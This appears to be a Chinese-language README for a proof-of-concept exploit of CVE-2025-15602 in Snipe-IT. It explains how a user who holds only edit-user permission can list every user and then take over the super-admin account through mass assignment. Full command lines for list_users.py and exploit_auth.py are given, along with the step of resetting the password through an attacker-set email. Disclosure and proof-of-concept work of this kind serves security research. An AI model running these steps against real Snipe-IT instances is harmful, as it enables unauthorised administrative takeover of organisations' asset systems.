CVE-2025-15602-PoC 是针对 Snipe-IT 中 CVE-2025-15602 漏洞的概念验证。 其中一个脚本用于列出所有用户,另一个脚本用于接管超级管理员账户。
用户只有编辑用户的权限,他可以利用该权限列出所有用户,并实现对超级管理员账户的接管。
别忘了修改脚本中的 BASE_URL,以匹配你的 snipe-it 实例。
列出实例中的所有用户,以获取你想接管的超级管理员的 id。
python3 list_users.py --attacker-username your_user --attacker-password your_pass --max-id 100
别忘了修改脚本中的 BASE_URL,以匹配你的 snipe-it 实例。
通过批量赋值(mass assignment)接管超级管理员账户。
重要: 你需要先从 list_users.py 获取正确信息,否则无法生效。id、username 和 first_name 必须与目标账户完全一致。
python3 exploit_auth.py \
--target-id 1 \
--admin-username admin \
--admin-firstname Admin \
--admin-email [email protected] \
--attacker-username your_user \
--attacker-password your_pass
之后,你可以通过你设置的电子邮件重置密码。
pip install requests beautifulsoup4